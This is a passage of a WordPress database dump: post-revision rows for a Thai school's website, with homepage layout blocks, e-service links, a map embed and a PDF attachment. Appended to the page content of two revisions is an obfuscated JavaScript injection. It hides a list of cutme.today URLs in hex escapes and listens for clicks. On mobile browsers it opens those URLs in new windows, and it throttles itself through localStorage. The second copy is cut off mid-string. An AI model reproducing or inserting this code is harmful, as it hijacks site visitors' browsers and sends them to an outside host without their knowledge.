adding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-09 11:55:20','2024-08-09 04:55:20','',14,'http://pakhaeng.ssk.in.th/?p=779',0,'revision','',0),
(780,1,'2024-08-09 11:56:52','2024-08-09 04:56:52','<!-- wp:file {\"id\":781,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/07แผนพัฒนาหน่วยงาน.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/07แผนพัฒนาหน่วยงาน.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"07แผนพัฒนาหน่วยงาน\"></object><a id=\"wp-block-file--media-3a6ea529-fde8-4f0f-b9f9-3047c0b479c8\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/07แผนพัฒนาหน่วยงาน.pdf\">07แผนพัฒนาหน่วยงาน</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/07แผนพัฒนาหน่วยงาน.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-3a6ea529-fde8-4f0f-b9f9-3047c0b479c8\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\